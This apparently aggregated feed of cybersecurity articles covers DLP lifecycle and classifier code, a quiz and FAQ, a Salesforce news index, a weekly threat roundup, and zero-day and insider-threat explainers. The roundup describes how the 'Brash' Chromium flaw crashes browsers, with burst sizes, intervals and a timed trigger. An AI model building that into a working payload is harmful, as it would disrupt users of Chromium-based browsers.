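    USE = auto()
    SHARING = auto()
    ARCHIVAL = auto()
    DESTRUCTION = auto()

# Illustrative transition map: which lifecycle stage may follow which.
ALLOWED = {
    Stage.CREATION: {Stage.STORAGE},
    Stage.STORAGE: {Stage.USE, Stage.ARCHIVAL, Stage.DESTRUCTION},
    Stage.USE: {Stage.STORAGE, Stage.SHARING},
    Stage.SHARING: {Stage.STORAGE},
    Stage.ARCHIVAL: {Stage.DESTRUCTION},
    Stage.DESTRUCTION: set(),  # terminal: secure disposal
}

def is_valid_transition(current: Stage, nxt: Stage) -> bool:
    """Return True if moving from `current` to `nxt` is permitted."""
    return nxt in ALLOWED[current]
```

Modeling the lifecycle explicitly makes violations easy to audit, such as data re-entering use after it was supposed to be destroyed.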

DLP Framework Components

A mature Data Loss Prevention (DLP) framework is far more than just a software installation; it is a holistic lifecycle that begins with data discovery, where automated tools scan the entire ecosystem—from on-premise servers to cloud environments—to identify where sensitive information resides. Once located, data classification applies persistent metadata tags to these files based on their sensitivity, such as PII, PHI, or intellectual property, ensuring the system understands the value of what it is protecting. Following this, policy enforcement acts as the frontline defense, utilizing granular rules to block, encrypt, or alert when data movements violate security protocols. To ensure long-term efficacy, continuous monitoring provides real-time visibility into data egress points and user behavior, allowing the organization to detect anomalies before they result in a breach.

When a violation does occur, a streamlined incident response workflow ensures that security teams can quickly contain the threat and investigate the root cause. Finally, the cycle is completed through rigorous audit reporting, which generates the necessary documentation to demonstrate regulatory compliance to stakeholders and governing bodies. This integrated approach transforms DLP from a reactive tool into a proactive pillar of an organization's overall cybersecurity posture and data governance strategy.
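A minimal sketch of the classification and policy-enforcement steps described above, assuming simple regex detectors and a per-channel allow-list. The labels, patterns, and channels are illustrative assumptions; real DLP platforms add fingerprinting, exact data matching, and ML classifiers:

```python
import re

# Illustrative regex classifiers; production DLP uses far richer detection.
CLASSIFIERS = {
    "PII_EMAIL": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
    "PII_SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "PCI_CARD": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

# Policy: which sensitivity classes may leave via which egress channel.
POLICY = {
    "email_external": {"PII_EMAIL"},  # bare e-mail addresses are allowed
    "cloud_upload": set(),            # nothing sensitive may be uploaded
}

def classify(text: str) -> set[str]:
    """Tag text with every sensitivity class whose pattern matches."""
    return {label for label, rx in CLASSIFIERS.items() if rx.search(text)}

def enforce(text: str, channel: str) -> str:
    """Return 'allow' or 'block' for a data movement on a channel."""
    violations = classify(text) - POLICY.get(channel, set())
    return "block" if violations else "allow"
```

The same pattern scales up: discovery feeds `classify`, and every egress point (email gateway, endpoint agent, cloud API) calls `enforce` before releasing data.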

ISO 27001:2022 Alignment

DLP Knowledge Quiz (10 Questions)

1. What is the primary goal of DLP?

2. Data being transferred via email is known as?

3. Which ISO 27001 clause focuses on risk treatment?

4. Which DLP technique tracks unique data patterns?

5. Endpoint DLP mainly protects against?

6. Which Annex A domain covers information protection?

7. False positives occur due to?

8. Cloud DLP primarily protects?

9. Secure deletion belongs to which lifecycle phase?

10. Continuous monitoring maps to which ISO clause?

Frequently Asked Questions

What is DLP in cybersecurity?
DLP prevents unauthorized data leakage across systems.
Is DLP mandatory for ISO 27001?
Not explicitly, but Annex A controls strongly support DLP.
Does DLP work in the cloud?
Yes, via API-based cloud DLP integrations.
What data does DLP protect?
PII, IP, financial, and regulated data.
Can DLP stop insider threats?
Yes, especially endpoint-based DLP.
Is AI used in DLP?
Yes, for classification and anomaly detection.
What is data in use?
Data actively accessed or processed.
How does DLP reduce compliance risk?
By enforcing policies and generating audit evidence.
Can DLP impact performance?
If misconfigured, yes — tuning is essential.
Is DLP a one-time setup?
No, it requires continuous improvement.
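As the FAQ notes, AI-assisted DLP flags anomalous data movement. A minimal sketch of that idea, assuming a z-score check on a user's daily outbound volume (the metric and the 3-standard-deviation threshold are illustrative choices, not a specific product's algorithm):

```python
from statistics import mean, stdev

def egress_anomaly(history_mb: list[float], today_mb: float,
                   z_threshold: float = 3.0) -> bool:
    """Flag today's outbound volume if it deviates strongly from the
    user's historical baseline (simple z-score heuristic)."""
    mu, sigma = mean(history_mb), stdev(history_mb)
    if sigma == 0:
        # Perfectly flat history: any change at all is anomalous.
        return today_mb != mu
    return abs(today_mb - mu) / sigma > z_threshold
```

Production systems replace this single statistic with behavioral models across many signals (time of day, destination, file type), but the principle of baselining per user is the same.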

Salesforce: Latest news and insights

7 January 2026 at 11:11

Salesforce (NYSE:CRM) is a vendor of cloud-based software and applications for sales, customer service, marketing automation, ecommerce, analytics, and application development. Based in San Francisco, Calif., its services include Sales Cloud, Service Cloud, Marketing Cloud, Commerce Cloud, and Salesforce Platform. Its subsidiaries include Tableau Software, Slack Technologies, and MuleSoft, among others.

The company is undergoing a pivot to agentic AI, increasingly focused on blending generative AI with a range of other capabilities to offer customers the ability to develop autonomous decision-making agents for their service and sales workflows. Salesforce has a market cap of $293 billion, making it the world’s 36th most valuable company by market cap.

Salesforce news and analysis

Salesforce’s Agentforce recalibration raises costs and complexity for CIOs

January 7, 2026: Salesforce is recalibrating its enterprise AI strategy — and CIOs could be footing the bill. Analysts warn the move will force CIOs to absorb new costs, revisit delivery timelines, and defend AI decisions that were once marketed as autonomous.

Salesforce is tightening control of its data ecosystem and CIOs may have to pay the price

December 17, 2025: Software partners are now feeling the impact of changes Salesforce announced in February to how it charges for API access, and are weighing whether to absorb the higher costs, pass them on to customers and risk backlash, or pursue alternative ways to access the data and risk straining their relationships with Salesforce.

Salesforce’s Agentforce 360 gets an enterprise data backbone with Informatica’s metadata and lineage engine

December 9, 2025: While studies suggest that a high number of AI projects fail, many experts argue that it’s not the model’s fault, it’s the data behind it. Salesforce aims to tackle this problem with the integration of its newest acquisition, Informatica.

Salesforce unveils observability tools to manage and optimize AI agents

November 20, 2025: Salesforce unveiled new Agentforce 360 observability tools to give teams visibility into why AI agents behave the way they do, and which reasoning paths they follow to reach decisions.

Salesforce unveils simulation environment for training AI agents

November 14, 2025: Salesforce AI Research today unveiled a new simulation environment for training voice and text agents for the enterprise. Dubbed eVerse, the environment leverages synthetic data generation, stress testing, and reinforcement learning to optimize agents.

Salesforce to acquire Doti to boost AI-based enterprise search via Slack

November 14, 2025: Salesforce will acquire Israeli startup Doti, aiming to enhance the AI-based enterprise search capabilities offered via Slack. The demand for efficient data retrieval and interpretation has been growing within enterprises, driven by the need to streamline workflows and increase productivity.

Salesforce’s glaring Dreamforce omission: Vital security lessons from Salesloft Drift

October 22, 2025: Salesforce’s Dreamforce conference offered a range of sessions on best practices for securing Salesforce environments and AI agents, but what it didn’t address were the weaknesses exposed by the recent spate of Salesforce-related breaches.

Salesforce updates its agentic AI pitch with Agentforce 360

October 13, 2025: Salesforce has announced a new release of Agentforce that, it said, “gives teams the fastest path from AI prototypes to production-scale agents” — although with many of the new release’s features still to come, or yet to enter pilot phases or beta testing, some parts of that path will be much slower than others.

Lessons from the Salesforce breach

October 10, 2025: The chilling reality of a Salesforce.com data breach is a jarring wake-up call, not just for its customers, but for the entire cloud computing industry. 

Salesforce brings agentic AI to IT service management

October 9, 2025: Salesforce is bringing agentic AI to IT service management (ITSM). The CRM giant is taking aim at competitors like ServiceNow with Agentforce IT Service, a new IT support suite that leverages autonomous agents to resolve incidents and service requests.

Salesforce Trusted AI Foundation seeks to power the agentic enterprise

October 2, 2025: As Salesforce pushes further into agentic AI, its aim is to evolve Salesforce Platform from an application for building AI to a foundational operating system for enterprise AI ecosystems. The CRM giant took a step toward that vision today, announcing innovations across the Salesforce Platform, Data Cloud, MuleSoft, and Tableau.

Salesforce AI Research unveils new tools for AI agents

August 27, 2025: Salesforce AI Research announced three advancements designed to help customers transition to agentic AI: a simulated enterprise environment framework for testing and training agents, a benchmarking tool to measure the effectiveness of agents, and a data cloud capability for autonomously consolidating and unifying duplicated data.

Attackers steal data from Salesforce instances via compromised AI live chat tool

August 26, 2025: A threat actor managed to obtain Salesforce OAuth tokens from a third-party integration called Salesloft Drift and used the tokens to download large volumes of data from impacted Salesforce instances. One of the attacker’s goals was to find and extract additional credentials stored in Salesforce records that could expand their access.

Salesforce acquires Regrello to boost automation in Agentforce

August 19, 2025: Salesforce is buying Regrello to enhance Agentforce, its suite of tools for building autonomous AI agents for sales, service, and marketing. San Francisco-based startup Regrello specializes in turning data into agentic workflows, primarily for automating supply-chain business processes.

Salesforce adds new billing options to Agentforce

August 19, 2025: In a move that aims to improve accessibility for agentic AI, Salesforce announced new payment options for Agentforce, its autonomous AI agent suite. The new options, built on the flexible pricing the company introduced in May, allow customers to use Flex Credits to pay for the actions agents take.

Salesforce to acquire Waii to enhance SQL analytics in Agentforce

August 11, 2025: Salesforce has signed a definitive agreement to acquire San Francisco-based startup Waii for an undisclosed sum to enhance SQL analytics within Agentforce, its suite of tools aimed at helping enterprises build autonomous AI agents for sales, service, marketing, and commerce use cases.

Could Agentforce 3’s MCP integration push Salesforce ahead in the CRM AI race?

June 25, 2025: “[Salesforce’s] implementation of MCP is one of the most ambitious interoperability moves we have seen from a CRM vendor or any vendor. It positions Agentforce as a central nervous system for multi-agent orchestration, not just within Salesforce but across the enterprise,” said Dion Hinchcliffe, lead of the CIO practice at The Futurum Group. But it introduces new considerations around security.

Salesforce Agentforce 3 promises new ways to monitor and manage AI agents

June 24, 2025: This is the fourth version of Salesforce Agentforce since its debut in September last year, with the newest, Agentforce 3, succeeding the previous ‘2dx’ release. A new feature of the latest version is Agentforce Studio, which is also available as a separate application within Salesforce.

Salesforce supercharges Agentforce with embedded AI, multimodal support, and industry-specific agents

June 18, 2025: Salesforce is updating Agentforce with new AI features and expanding it across every facet of its ecosystem with the hope that enterprises will see the no-code platform as ready for tackling real-world digital execution, shaking its image of being a module for pilot projects.

CIOs brace for rising costs as Salesforce adds 6% to core clouds, bundles AI into premium plans

June 18, 2025: Salesforce is rolling out sweeping changes to its pricing and product packaging, including a 6% increase for Enterprise and Unlimited Editions of Sales Cloud, Service Cloud, Field Service, and select Industries Clouds, effective August 1.

Salesforce study warns against rushing LLMs into CRM workflows without guardrails

June 17, 2025: A new benchmark study from Salesforce AI Research has revealed significant gaps in how large language models handle real-world customer relationship management tasks.

Salesforce Industry Cloud riddled with configuration risks

June 16, 2025: AppOmni researchers found 20 insecure configurations and behaviors in Salesforce Industry Cloud’s low-code app building components that could lead to data exposure.

Salesforce changes Slack API terms to block bulk data access for LLMs

June 11, 2025: Salesforce’s Slack platform has changed its API terms of service to stop organizations from using Large Language Models to ingest the platform’s data as part of its efforts to implement better enterprise data discovery and search.

Salesforce to buy Informatica in $8 billion deal

May 27, 2025: Salesforce has agreed to buy Informatica in an $8 billion deal as a way to quickly access far more data for its AI efforts. Analysts generally agreed that the deal was a win-win for both companies’ customers, but for very different reasons.

Salesforce wants your AI agents to achieve ‘enterprise general intelligence’

May 1, 2025: Salesforce AI Research unveiled a slate of new benchmarks, guardrails, and models to help customers develop agentic AI optimized for business applications.

Salesforce CEO Marc Benioff: AI agents will be like Iron Man’s Jarvis

April 17, 2025: AI agents are more than a productivity boost; they’re fundamentally reshaping customer interactions and business operations. And while there’s still work to do on trust and accuracy, the world is beginning a new tech era — one that might finally deliver on the promises seen in movies like Minority Report and Iron Man, according to Salesforce CEO Marc Benioff.

Agentblazer: Salesforce announces agentic AI certification, learning path

March 6, 2025: Hot on the heels of the release of Agentforce 2dx for developing, testing, and deploying AI agents, Salesforce introduced Agentblazer Status to its Trailhead online learning platform.

Salesforce takes on hyperscalers with Agentforce 2dx updates

March 6, 2025: Salesforce’s updates to its agentic AI offering — Agentforce — could give the CRM software provider an edge over its enterprise application rivals and hyperscalers including AWS, Google, IBM, ServiceNow, and Microsoft.

Salesforce’s Agentforce 2dx update aims to simplify AI agent development, deployment

March 5, 2025: Salesforce released the third version of its agentic AI offering — Agentforce 2dx — to simplify the development, testing, and deployment of AI agents that can automate business processes across departments, such as sales, service, marketing, finance, HR, and operations.

Salesforce’s AgentExchange targets AI agent adoption, monetization

March 4, 2025: Salesforce is launching a new marketplace named AgentExchange for its agents and agent-related actions, topics, and templates to increase adoption of AI agents and allow its partners to monetize them.

Salesforce and Google expand partnership to bring Agentforce, Gemini together

February 25, 2025: The expansion of the strategic partnership will enable customers to build Agentforce AI agents using Google Gemini and to deploy Salesforce on Google Cloud.

AI to shake up Salesforce workforce with possible shift to sales over IT

February 5, 2025: With the help of AI, Salesforce can probably do without some staff. At the same time, the company needs salespeople trained in new AI products, CEO Marc Benioff has stated.

Salesforce’s Agentforce 2.0 update aims to make AI agents smarter

December 18, 2024: The second release of Salesforce’s agentic AI platform offers an updated reasoning engine, new agent skills, and the ability to build agents using natural language.

Meta creates ‘Business AI’ group led by ex-Salesforce AI CEO Clara Shih

November 20, 2024: The ex-CEO of Salesforce AI, Clara Shih, has turned up at Meta just a few days after quitting Salesforce. In her new role at Meta she will set up a new Business AI group to package Meta’s Llama AI models for enterprises.

CEO of Salesforce AI Clara Shih has left

November 15, 2024: The CEO of Salesforce AI, Clara Shih, has left after just 20 months in the job. Adam Evans, previously senior vice president of product for Salesforce AI Platform, has moved up to the newly created role of executive vice president and general manager of Salesforce AI.

Marc Benioff rails against Microsoft’s copilot

October 24, 2024: Salesforce’s boss doesn’t have a good word to say about Microsoft’s AI assistants, saying the technology is basically no better than Clippy 25 years ago.

Salesforce’s Financial Services Cloud targets ops automation for insurance brokerages

October 16, 2024: Financial Services Cloud for Insurance Brokerages will bring new features to help with commissions management and employee benefit servicing, among other things, when it is released in February 2025.

Explained: How Salesforce Agentforce’s Atlas reasoning engine works to power AI agents

September 30, 2024: AI agents created via Agentforce differ from previous Salesforce-based agents in their use of Atlas, a reasoning engine designed to help these bots think like human beings.

5 key takeaways from Dreamforce 2024

September 20, 2024: As Salesforce’s 2024 Dreamforce conference rolls up the carpet for another year, here’s a look at a few high points as Salesforce pitched a new era for its customers, centered around Agentforce, which brings agentic AI to enterprise sales and service operations.

Alation and Salesforce partner on data governance for Data Cloud

September 19, 2024: Data intelligence platform vendor Alation has partnered with Salesforce to deliver trusted, governed data across the enterprise. It will do this, it said, with bidirectional integration between its platform and Salesforce’s to seamlessly deliver data governance and end-to-end lineage within Salesforce Data Cloud. This enables companies to directly access key metadata (tags, governance policies, and data quality indicators) from over 100 data sources in Data Cloud, it said.

New Data Cloud features to boost Salesforce’s AI agents

September 17, 2024: Salesforce added new features to its Data Cloud to help enterprises analyze data from across their divisions and also boost the company’s new autonomous AI agents released under the name Agentforce, the company announced at the ongoing annual Dreamforce conference.

Dreamforce 2024: Latest news and insights

September 17, 2024: Dreamforce 2024 boasts more than 1,200 keynotes, sessions, and workshops. While this year’s event will encompass a wide spectrum of topics, expect Salesforce to showcase Agentforce next week.

Salesforce unveils Agentforce to help create autonomous AI bots

September 12, 2024: The CRM giant’s new low-code suite enables enterprises to build AI agents that can reason for themselves when completing sales, service, marketing, and commerce tasks.

Salesforce to acquire data protection specialist Own Company for $1.9 billion

September 6, 2024: The CRM company said Own’s data protection and data management solutions will help it enhance availability, security, and compliance of customer data across its platform.

Salesforce previews new XGen-Sales model, releases xLAM family of LLMs

September 6, 2024: The XGen-Sales model, which is based on the company’s open source APIGen and its family of large action models (LAM), will aid developers and enterprises in automating actions taken by AI agents, analysts say.

Salesforce mulls consumption pricing for AI agents

August 30, 2024: Investors expect AI agent productivity gains to reduce demand for Salesforce license seats. CEO Marc Benioff says a per-conversation pricing model is a likely solution.

Coforge and Salesforce launch new offering to accelerate net zero goals

August 27, 2024: Coforge ENZO is designed to streamline emissions data management by identifying, consolidating, and transforming raw data from various emission sources across business operations.

Salesforce unveils autonomous agents for sales teams

August 22, 2024: Salesforce today announced two autonomous agents geared to help sales teams scale their operations and hone their negotiation skills. Slated for general availability in October, Einstein Sales Development Rep (SDR) Agent and Einstein Sales Coach Agent will be available through Sales Cloud, with pricing yet to be announced.

Salesforce to acquire PoS startup PredictSpring to augment Commerce Cloud

August 2, 2024: Salesforce has signed a definitive agreement to acquire cloud-based point-of-sale (PoS) software vendor PredictSpring. The acquisition will augment Salesforce’s existing Customer 360 capabilities.

Einstein Studio 1: What it is and what to expect

July 31, 2024: Salesforce has released a set of low-code tools for creating, customizing, and embedding AI models in your company’s Salesforce workflows. Here’s a first look at what can be achieved using it.

Why are Salesforce and Workday building an AI employee service agent together?

July 26, 2024: Salesforce and Workday are partnering to build a new AI-based employee service agent based on a common data foundation. The agent will be accessible via their respective software interfaces.

Salesforce debuts gen AI benchmark for CRM

June 18, 2024: The software company’s new gen AI benchmark for CRM aims to help businesses make more informed decisions when choosing large language models (LLMs) for use with business applications.

Salesforce updates Sales and Service Cloud with new capabilities

June 6, 2024: The CRM software vendor has added new capabilities to its Sales Cloud and Service Cloud with updates to its Einstein AI and Data Cloud offerings, including additional generative AI support.

IDC Research: Salesforce 1QFY25: Building a Data Foundation to Connect with Customers

June 5, 2024: Salesforce reported solid growth including $9.13 billion in revenue or 11% year-over-year growth. The company has a good start to its 2025 fiscal year, but the market continues to shift in significant ways, and Salesforce is not immune to those changes.

IDC Research: Salesforce Connections 2024: Making Every Customer Journey More Personalized and Profitable Through the Einstein 1 Platform

June 5, 2024: The Salesforce Connections 2024 event showcased the company’s efforts to revolutionize customer journeys through its innovative artificial intelligence (AI)-driven platform, Einstein 1. Salesforce’s strategic evolution at Connections 2024 marks a significant step forward in charting the future of personalized and efficient AI-driven customer journeys.

Salesforce launches Einstein Copilot for general availability

April 25, 2024: Salesforce has announced the general availability of its conversational AI assistant along with a library of pre-programmed ‘Actions’ to help sellers benefit from conversational AI in Sales Cloud.

Salesforce debuts Zero Copy Partner Network to streamline data integration

April 25, 2024: Salesforce has unveiled a new global ecosystem of technology and solution providers geared to helping its customers leverage third-party data via secure, bidirectional zero-copy integrations with Salesforce Data Cloud.

Salesforce-Informatica acquisition talks fall through: Report

April 22, 2024: Salesforce’s negotiations to acquire enterprise data management software provider Informatica have fallen through, as the two companies couldn’t agree on the terms of the deal. The disagreement is most likely over the price of each Informatica share.

Decoding Salesforce’s plausible $11 billion bid to acquire Informatica

April 17, 2024: Salesforce is seeking to acquire enterprise data management vendor Informatica, in a move that could mean consolidation for the integration platform-as-a-service (iPaaS) market and a new revenue stream for Salesforce.

Salesforce adds Contact Center updates to Service Cloud

March 26, 2024: Salesforce has announced new Contact Center updates to its Service Cloud, including features such as conversation mining and generative AI-driven survey summarization.

Salesforce bids to become AI’s copilot building platform of choice

March 7, 2024: Salesforce has entered the race to offer the preeminent platform for building generative AI copilots with Einstein 1 Studio, a new set of low-code/no-code AI tools for accelerating the development of gen AI applications. Analysts say Einstein 1 Studio has the tools to become the go-to platform for building and deploying gen AI assistants.

Salesforce rebrands its low-code platform to Einstein 1 Studio

March 6, 2024: Salesforce has rebranded its low-code platform to Einstein 1 Studio and bundled it with the company’s Data Cloud offering. The platform has added a new feature, Prompt Builder, which allows developers to create reusable LLM prompts without the need for writing code.

Salesforce’s Einstein 1 platform to get new prompt-engineering features

February 9, 2024: Salesforce is working on adding two new prompt engineering features to its Einstein 1 platform to speed up the development of generative AI applications in the enterprise. The features include a testing center and the provision of prompt engineering suggestions.


The Good, the Bad and the Ugly in Cybersecurity – Week 44

31 October 2025 at 09:11

The Good | Former GM of DoD Contractor Pleads Guilty to Selling U.S. Cyber Secrets

Peter Williams, a former general manager at U.S. defense contractor L3Harris Trenchant, has pleaded guilty in U.S. federal court to two counts of stealing and selling classified cybersecurity tools and trade secrets to a Russian exploit broker.

Between 2022 and 2025, Williams stole at least eight restricted cyber-exploit components that were developed for the U.S. government and select allied partners. The DoJ stated that these tools, valued at $35 million, were part of Trenchant’s sensitive research and were never intended for foreign sale. Williams sold them for at least $1.3 million in cryptocurrency, signing formal contracts with the Russian intermediary for the initial sale of the components as well as a promise to provide follow-on technical support. Williams used the illicit proceeds to purchase luxury items, according to court filings.

Trenchant, L3Harris Technologies’ cyber capabilities arm, develops advanced offensive and defensive tools used by government agencies within the Five Eyes intelligence alliance. According to the DoJ, Williams abused his privileged access at Trenchant Systems to siphon the data, giving various customers of the broker, including the Russian government and other foreign cyber threat actors, an edge in targeting U.S. citizens, businesses, and critical infrastructure.

While the court reports did not name the broker, prior reporting suggests it may be Operation Zero, a Russian platform known for buying and reselling zero-day exploits, often rewarding developers with large cryptocurrency payouts.

Source: X via CyberScoop

Williams now faces up to 10 years in prison and fines of $250,000 or twice the profit gained. As cyber brokers increasingly operate as international arms dealers, law enforcement officials reaffirm their hard stance against malicious insiders abusing their positions of trust.

The Bad | New “Brash” Flaw Crashes Chromium Browsers with Timed Attacks

Security researcher Jose Pino has disclosed a severe vulnerability in Chromium’s Blink rendering engine that allows attackers to crash Chromium-based browsers within seconds. Pino has named the vulnerability “Brash” and attributes it to an architectural oversight that fails to rate-limit updates to the document.title API. Without the rate-limiting, an attacker can generate millions of document object model (DOM) mutations per second by repeatedly changing the page title, overwhelming the browser, and consuming CPU resources until the UI thread becomes unresponsive.

Source: GitHub

The Brash exploit occurs in three phases. First, the attacker prepares a hash seed by loading 100 unique 512-character hexadecimal strings into memory to vary title updates and maximize the impact of the attack. Then, the attacker launches burst injections of three consecutive document.title updates, which in default test settings inject roughly 24 million updates per second using a burst size of 8,000 and a 1 ms interval. Lastly, the sustained stream of updates saturates the browser’s main thread, forcing both the tab and the browser to hang or crash and requiring forced termination.

Brash can be scheduled to run at precise moments, enabling a logic-bomb style attack that remains dormant until a timed trigger activates. This increases the danger since attackers can control when the large-scale disruption will occur. Hypothetically, a single click on a specially crafted URL can detonate the attack with millisecond accuracy and little initial indication.

The vulnerability affects Google Chrome and all Chromium-based browsers, including Microsoft Edge, Brave, Opera, Vivaldi, Arc, Dia, OpenAI ChatGPT Atlas, and Perplexity Comet. Browsers built on other engines, such as Mozilla Firefox (Gecko) and Apple Safari (WebKit), are not vulnerable to Brash, and neither are iOS third-party browsers, which are required to use WebKit.
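
The underlying fix is the rate limiting the researcher says Blink lacks for document.title. As a conceptual illustration only (this is not Chromium code), a token-bucket limiter sketched in Python shows how a renderer could coalesce a flood of title updates instead of queuing them all:

```python
import time

class TokenBucket:
    """Simple token bucket: allow at most `rate` updates per second,
    with bursts of up to `capacity` updates."""
    def __init__(self, rate: float, capacity: int):
        self.rate = rate
        self.capacity = capacity
        self.tokens = float(capacity)
        self.last = time.monotonic()

    def allow(self) -> bool:
        now = time.monotonic()
        # Refill tokens proportionally to elapsed time, capped at capacity.
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False  # excess updates are dropped/coalesced, not queued

# A renderer guarded this way would reduce the millions of per-second
# document.title writes Brash generates to a handful per second.
bucket = TokenBucket(rate=10, capacity=20)
accepted = sum(bucket.allow() for _ in range(1_000_000))
print(accepted)
```

With this guard, sustained throughput is capped at `rate` and bursts at `capacity`, which is exactly the property whose absence Brash exploits.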

The Ugly | Hacktivists Manipulate Canadian Industrial Systems, Triggering Safety Risks

The Canadian Centre for Cyber Security has issued a warning that hacktivists have breached multiple critical infrastructure systems across Canada, altering industrial controls in ways that could have created dangerous conditions. The alert highlights rising malicious activity that targets internet-exposed Industrial Control Systems (ICS) and urges firms to shore up their security measures to prevent such attacks.

The bulletin cites three recent incidents. In the first, a water treatment facility experienced tampering with water pressure controls, degrading service for the local community. Following that, a Canadian oil and gas company had its Automated Tank Gauge (ATG) manipulated, triggering false alarms. In a third breach, a grain drying silo on a farm had temperature and humidity settings altered, creating potentially unsafe conditions if the changes had gone undetected.

Authorities believe these attacks were opportunistic rather than technically sophisticated, and intended to attract media attention, undermine public trust, and harm the reputation of Canadian authorities. Hacktivists have been known to collaborate with advanced persistent threat (APT) groups to amplify the reach of disruptive acts and cause public unrest.

Although none of the targeted facilities suffered damage, the incidents underline inherent risks in poorly protected ICS, including programmable logic controllers (PLCs), supervisory control and data acquisition (SCADA) systems, human-machine interfaces (HMIs), and industrial IoT devices.

The Cyber Centre recommends that organizations inventory and secure internet-accessible ICS devices, remove direct internet exposure where possible, implement VPNs with multi-factor authentication (MFA), maintain regular firmware updates, and conduct regular penetration testing. Resources like the Cyber Security Readiness Goals (CRGs) can offer guidance for critical infrastructure firms and officials remind organizations that suspicious activity should be reported via My Cyber Portal or to local authorities to reduce risks of future compromise.

Source: Canadian Centre for Cyber Security

How to Detect and Mitigate Zero-Day Vulnerabilities

30 September 2025 at 07:00


Companies face increasingly sophisticated, unpredictable cyber threats. Zero-day vulnerabilities are among the greatest risks: software flaws that are unknown to defenders and exploited before a fix is available, potentially compromising thousands of organizations.

Stopping zero-day attacks is a top priority for security teams, requiring faster identification, detection, and mitigation to prevent damage. But how do these attacks work, and what practices really help?

Introducing the Problem: What Is a Zero-Day Attack?

A zero-day vulnerability is a hidden security flaw unknown to vendors or developers. Without an immediate fix, systems remain exposed to attacks. These vulnerabilities are particularly dangerous and pose complex risk-management challenges. Adversaries can exploit them before the flaw becomes public or is patched, causing significant harm. The term “zero-day” reflects that defenders have had zero days to prepare.

Within this definition, another concept matters: the zero-day exploit. Although related, vulnerability and exploit are different—and recognizing that difference is critical.

Zero-Day Exploit Definition: What They Are and How They Work

A Zero Day exploit is the tool hackers use to leverage a vulnerability. They can be highly damaging and difficult to defend against and are often sold on the dark web, making them valuable and dangerous.

When an attacker discovers a vulnerability unknown to anyone else, they develop specific code to exploit it and integrate it into malware. Once that code executes on the system, it can give the attacker control or access to sensitive information.

There are several ways to exploit a Zero Day vulnerability. One of the most common is through phishing: emails with infected attachments or links containing the hidden exploit. By clicking or opening the file, the malware activates and compromises the system without the user noticing.

A well-known case was the attack on Sony Pictures Entertainment in 2014.[1] Cybercriminals used a Zero Day exploit to leak confidential information such as unreleased movie copies, internal emails, and private documents.

Which Systems Are Most Targeted for Zero-Day Exploitation?


Threat actors frequently target high-value systems and supply chains. Common targets include:

  • Operating Systems: Windows, macOS, Linux.
  • Web Browsers: Engines, plugins, and extensions (Chromium, Firefox, Brave, etc.).
  • Office Suites: Microsoft Office, Google Workspace.
  • Mobile OS: iOS and Android.
  • CMS Platforms: WordPress, Joomla, Drupal (core, plugins, themes).
  • Network/IoT Devices: Routers, firewalls, connected devices.
  • Enterprise Apps: ERP/CRM like SAP and Oracle.

Techniques to Identify Zero-Day Vulnerabilities


Facing Zero Day vulnerabilities requires a combination of technological foresight and constant monitoring of the digital environment. In this scenario, having a trusted partner can make a difference, helping organizations reduce risks and proactively strengthen their security posture. Various techniques also help detect and neutralize potential Zero Day attacks.

  1. Vulnerability Scanning

    Periodic scans of systems and networks identify potential weaknesses, including flaws in third-party software components. Early detection allows rapid mitigation through patching and other security updates.

  2. Behavioral Anomaly Detection

    Monitoring network and system behavior can detect anomalies indicating deviations from normal operation. Abnormal network traffic, unusual resource usage, or unauthorized access attempts may indicate Zero Day exploitation attempts. 

  3. Signature-Less Analytics

    Advanced threat detection methods, like anomaly detection and machine learning algorithms, allow for identifying suspicious behavior without relying on known attack signatures.

  4. Threat Intelligence

    Threat intelligence channels and information-sharing communities provide relevant data on emerging threats and Zero Day vulnerabilities. Organizations can proactively monitor associated vulnerability indicators, enabling timely defensive actions.

  5. Sandboxing & Emulation

    Sandboxing and emulation techniques allow for analyzing suspicious files or executables in isolated environments. Behavioral analysis in a controlled setting helps detect potential Zero Day exploits early.

  6. User Behavior Analytics (UBA)

    UBA solutions can detect anomalies indicating Zero Day attacks, such as unusual login locations or unauthorized privilege escalation. Essentially, they monitor user activity and access patterns.

  7. Continuous Monitoring & IR Readiness

    Robust monitoring practices and incident response procedures enable rapid detection, investigation, and mitigation of Zero Day attacks. Periodic security audits, penetration testing, and simulation exercises improve organizational readiness against threats.
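
Several of the techniques above (behavioral anomaly detection, signature-less analytics, UBA) reduce to flagging deviations from a learned baseline. A minimal z-score sketch in Python, with made-up request-rate numbers, illustrates the idea; production systems use far richer features and models:

```python
from statistics import mean, stdev

def zscore_anomalies(baseline, observed, threshold=3.0):
    """Flag observations more than `threshold` standard deviations
    from the baseline mean (e.g., requests per minute per host)."""
    mu, sigma = mean(baseline), stdev(baseline)
    return [x for x in observed if abs(x - mu) / sigma > threshold]

# Baseline: normal requests-per-minute; observed: one burst of the kind
# that might accompany exploit staging or data exfiltration.
baseline = [98, 102, 101, 99, 100, 97, 103, 100]
print(zscore_anomalies(baseline, [101, 99, 450]))  # → [450]
```

The point is that no attack signature is needed: the burst is flagged purely because it deviates from normal behavior.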

Strengthening Defenses Against Zero-Day Vulnerabilities

It is clear that implementing comprehensive security strategies is essential. Measures combining continuous monitoring, proactive detection, and automated response allow organizations to anticipate attacks and significantly reduce risks.

Integrating advanced solutions helps protect critical systems before vulnerabilities are exploited. Adopting a Zero Trust approach is crucial for minimizing risks associated with Zero Day vulnerabilities. This security philosophy, which continuously validates every access and privilege, ensures that even if an exploit enters, its impact is effectively contained.

With the support of experts and specialized tools, organizations can strengthen their cybersecurity posture, maintain operational continuity, and protect sensitive information. While this process is not simple, in a technology-driven world, both for better and worse, it has become a priority.

References
1. Alex Altman. (2014, Dec 22). “No Company Is Immune to a Hack Like Sony’s.” Time.

What Is an Insider Threat?

12 August 2025 at 02:00


In 2024, the average cost of an insider threat incident reached $17.4 million.[1] When you consider that these types of incidents happen daily, it becomes clear that we’re facing a frequent and expensive danger. So, what is an insider threat? Today, it means much more than a data leak; it’s a strategic vulnerability that can disrupt business continuity.

What Is an Insider Threat in Cybersecurity?

In cybersecurity, the danger doesn’t always come from outside. Insider threats are security risks originating within the organization, caused by someone who works there or has authorized access to its systems and networks. These threats may be intentional or accidental.

